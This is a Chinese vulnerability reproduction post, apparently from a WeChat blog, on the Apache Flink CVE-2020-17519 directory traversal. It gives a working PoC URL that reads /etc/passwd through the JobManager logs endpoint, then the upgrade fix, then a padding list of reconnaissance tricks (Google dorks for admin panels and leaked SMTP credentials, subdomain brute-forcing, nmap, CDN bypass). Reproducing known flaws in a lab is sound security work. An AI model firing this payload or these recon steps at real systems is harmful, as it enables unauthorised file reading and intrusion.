1、漏洞描述
Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力
Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件
2、漏洞影响范围:
Apache Flink 1.11.0、Apache Flink 1.11.1、Apache Flink 1.11.2
3、漏洞复现:
环境:
kali:192.168.4.157
ubuntu:192.168.4.128
docker
http://192.168.4.128:8081
POC: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
参考资料:
-
https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801
-
https://nvd.nist.gov/vuln/detail/CVE-2020-17519
4、修复建议:
升级Flink版本至1.11.3及以上
凑点字数:
1、收集域名信息
# whois
# https://www.tianyancha.com
2、收集敏感信息
# site:edu.cn intext:后台
#sit:Github.com smtp @163.com
#firefox 工作台查找有用信息
# https://www.exploit-db.com/google-hacking-database
3、收集子域名信息
#fierce -dns baidu.com -threads 10
#site:baidu.com
4、收集常用端口
# nmap 192.168.1.110
5、指纹识别
# whatweb
#御剑web指纹识别
#云悉指纹识别 http://www.yunsee.con/finger.html
6、绕过CDN
# http://ping.chinaz.com
# https://www.netcraft.com
# https://dns.aizhan.com
7、目录爆破
#御剑
原文始发于微信公众号(红豆芷浠):Apache Flink jobmanager/logs 目录穿越漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论